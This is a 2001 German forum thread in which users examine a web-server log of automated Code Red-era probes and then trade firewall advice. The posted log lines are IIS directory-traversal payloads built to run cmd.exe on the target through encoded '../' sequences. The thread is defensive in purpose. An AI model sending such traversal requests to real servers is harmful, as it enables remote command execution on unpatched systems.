Descentforum.DE

[Bitch]

Schlimm, wenn man seinen Server ständig am Netz hängen hat...

Kleiner Auszug aus meinem Log-File für den Apache-Webserver unter Linux...


213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
213.250.36.252 - - [06/Oct/2001:22:03:43 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
213.250.36.252 - - [06/Oct/2001:22:03:44 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.250.36.252 - - [06/Oct/2001:22:03:45 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
213.250.36.252 - - [06/Oct/2001:22:03:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312


Zum Glück nix passiert...wohl das falsche OS...
War das Code-Red?



greetings, b!tch

[Lex]

Heh sieht ja interessant aus. Ich denke nicht dass das ein Virus oder Trojaner ist. Da hat einer versucht, cmd.exe über einen simplen GET request auszuführen.
Hier der Auszug aus der WHOIS Datenbank:
http://www.ripe.net/perl/whois?query=213.250.36.252+
Slowenien...naja...

Hmm..ein Widnows Webserver scheint aber tatsächlich irgendwie darauf zu reagieren.


------------------------------
Its not a bug. Its a feature.

[Maulwurf]

hast du keinen firewall laufen?


... mehr hits, mehr kicks ...

[Lex]

Ach herie du scheisse.....Auf dem Win2k Webserver scheint das tatsächlich zu funktionieren! Na toll.....

Firewall nützt dich hier null und nix, weil das ein stink normaler URL request zum Webserver ist.


------------------------------
Its not a bug. Its a feature.

[Maulwurf]

aha. (hab da ja null plan )
soviel zu sicherheit.


... mehr hits, mehr kicks ...

[DJ-Fuck]

Hahahahaha Windows und sicher...2 Sachen die sich nicht vertragen...

...immer im Fadenkreuz...

[Bitch]

Deswegen ist mein gateway zum internet ja auch ein linux-rechner...

Bei Windows sollte man wohl echt nicht die Standardverzeichnisse (C:Winnt, usw.) nehmen, macht es den Typen dann wenigstens etwas schwieriger...

Firewall muss ich mal etwas abdichten, bis jetzt habe ich viele Ports offen.

@Seeker: Lex hat da völlig recht, die Anfrage kam ja auf port 80 (http) rein, da laufen ja nun normalerweise webserver...





greetings, b!tch

[Bitch]

Laut Virenbibliothek bei McAfee sind die Anfragen auf den Code Red Virus zurückzuführen.

[url]http://vil.nai.com/vil/virusSummary.asp?virus_k=99177[/url]



greetings, b!tch

[Lex]

Heh frag mich nicht wieso mich das nicht wundert.......

Was doch sehr wundert ist dass der immer noch aktiv ist


------------------------------
Its not a bug. Its a feature.

[Do_Checkor]

ich bekomm so langsam das Dumme Gefühl das der auch hier irgendwie noch drin is

weil irgendwie is in diesem Forum der WURM drin !!

[Maulwurf]

bei mir wird sowas aber geblockt:

A computer at IP address 62.54.76.129 has attempted an unsolicited connection to TCP port 80 on your machine.
TCP port 80 is commonly used by the World Wide Web HTTP service or program. HTTP is used to serve and request WWW pages.

was ich noch checken muss is das:

The source IP is on your local network. Click here for more information about what this means.


ich seh aber grad dass ich das auch von außerhalb hab. von dem her ...

neowatch!


... mehr hits, mehr kicks ...

[Lex]

Ja ich habe hier seit langem andauernd solche Anforderungen. So hab ich jetzt gleich schnell ein proggi geschrieben, das diese Attacken loggt. Und siehe da:
Das sind alles requests wie Bitch sie protokkoliert hat!

Ich werd jetzt mal ein bisschen loggen und das file dann zu meinem ISP senden.

Wenn jemand das tool haben will bitte melden...


------------------------------
Its not a bug. Its a feature.

[Dunka]

Das muss nicht unbedingt der Virus selbst
sein. Auch möglich dass noch Trittbrettfahrer versuchen die Löcher auszunutzen die CodeRed gebohrt hat...

// This is a comment! I love comments

[Bitch]

Habe etwas mit ZoneAlarm herumprobiert, macht einen ganz guten Eindruck. Zu empfehlen, wenn man mit dem Rechner unter Windoofs direkt ins Netz geht ohne Firewall oder so dazwischen...

[url]http://www.zonealarm.com[/url]

Gibt's auch als Freeware-Version

Jo Lex, mail das Teil mal rüber, danke!


greetings, b!tch

Bearbeitet von - B!tch am 10/10/2001 11:06:46

[Maulwurf]

das kann aber auch davon kommen, dass das ding lief wenn man descent spielt.
ich weiß nicht ob ich die richtige vorstellung hab von der funktionsweise von so nem firewall.
checkt der die pakete die ankommen, und schaut ob da so ein angriff oä mit reingepackt ist? weil vom server kommt ja ziemlich viel zurück und da kanns ja schon mal sein dass ein packet so nem angriffspacket ähnlich oder gleich schaut.
oder steh ich hier im wald?


... mehr hits, mehr kicks ...

[DDevil]

Hier mal mein Senf:-)

ich habe jetzt schon mit mehreren Firewalls rumgespielt und nicht eine sagt mir zu.
Dieses immer wieder nachfragen ob erlaubt oder nicht empfinde ich als echt nervig.
Zumal ab und zu man echt nicht identifizieren kann ob das nun gecancelt werden kann oder nicht. Im schlimmsten Fall funktionieren auf einmal ein paar Sachen nicht mehr und man sucht dann wie verückt nach der Regel die das verhindert.

Apropo:-) Regel. Die meisten Firewalls arbeiten die Regeln von oben nach unten ab. D.h.
oben verboten, weiter unten ein bestimmter Teil erlaubt = verboten ! Keine Verbindung.
Ich versuch mal ein Beispiel:

Programm macht auf einem Port eine Anfrage raus die man nicht identifizieren kann und man verbietet diese Verbindung, da das Programm aber mehrere Ports öffnet bekommt man erstmal keine negative Nachricht, das Programm ( meistens Spiele ) wechselt nun auf Benutzeranforderung in einen anderen Modus ( z.B. Teilnahme an Spiel ) und braucht dazu nun wieder genau den Port den man eben noch gesperrt hat.(

So oder so ähnlich ist es mir gegangen. Direkte Deinstallation hat dann wieder alles zurecht gerückt.

Durch den Artikel in der aktuellen CT über Sicherheit etc. angestachelt habe ich mir die dort vorgestellte Firewall gesaugt und getestet. Alleine um in Multiplayer zukommen habe ich ca. 15x den ERLAUBEN Button angeklickt. Verwundert hat mich aller Dings das die Ports von D3 keiner Abfrage unterworfen wurden. Ätzend ist auf meinem System das ich D3 insgesamt 4x gestartet habe. Leider stürzt D3 bei mir ab wenn ich zurück auf den Desktop muss.((((

Muss halt jeder für sich selber wissen ob er ne Firewall braucht oder nicht.

Mein Rechner ist zum daddeln da und sonst nichts, also egal wenn abgeschossen, ne knappe Stunde und er rennt wieder.



DDevil

[Maulwurf]

also bei NeoWatch kann ich sagen was passieren soll wenn so eine Anfrage kommt.
ich hab das so eingestellt, dass das tray icon uz blinken anfängt und sonst nix. fertig. --> null probleme --> null probleme beim spielen oder surfen


... mehr hits, mehr kicks ...

[Lex]

Zone alarm ist recht gut, ich schalt es allerdings ab wenn ich zocke.

@Seeker: Ja Du stehst da schon etwas im Wald. Eine Firewall blockiert einfach alle Anforderungen von aussen, bzw Zugriffe nach aussen, es sei denn der Benutzer erlaubt ausdrücklich den betreffenden TCP-Port. Normalerweidse werden keine Paketinhalte gescannt.

Hier das Tool: http://www.leual.ch/downloads/webview.zip
Es läuft aber nicht parallel zu einem Webserver! Diesen vorher deaktivieren.



Ähm..Checkor..wieso kann ich keine Dateien mehr uploaden?

------------------------------
Its not a bug. Its a feature.

[frog]

Hallo

Vielleicht kennt jemand ja diese Adresse noch nicht. Um einen EIGENEN Rechner zu testen, ist das die beste Seite die ich kenne:

[url]https://check.lfd.niedersachsen.de/Selbsttest/service/selbsttest.php[/url]

Grüße
frog

[Do_Checkor]

oops - naja - sorry aber bei den **zig Versuchen die Fehler im Forum auszumerzen hab ich ab nem bestimmten Punkt unsauber gearbeitet.

Manche Funkionen funzen nicht mehr, nicht mehr ganz oder es gibt Fehler - bitte meldet euch - dann versuch ich die Sachen zu klären...

da fonk... is something you can - errrrr - fonk.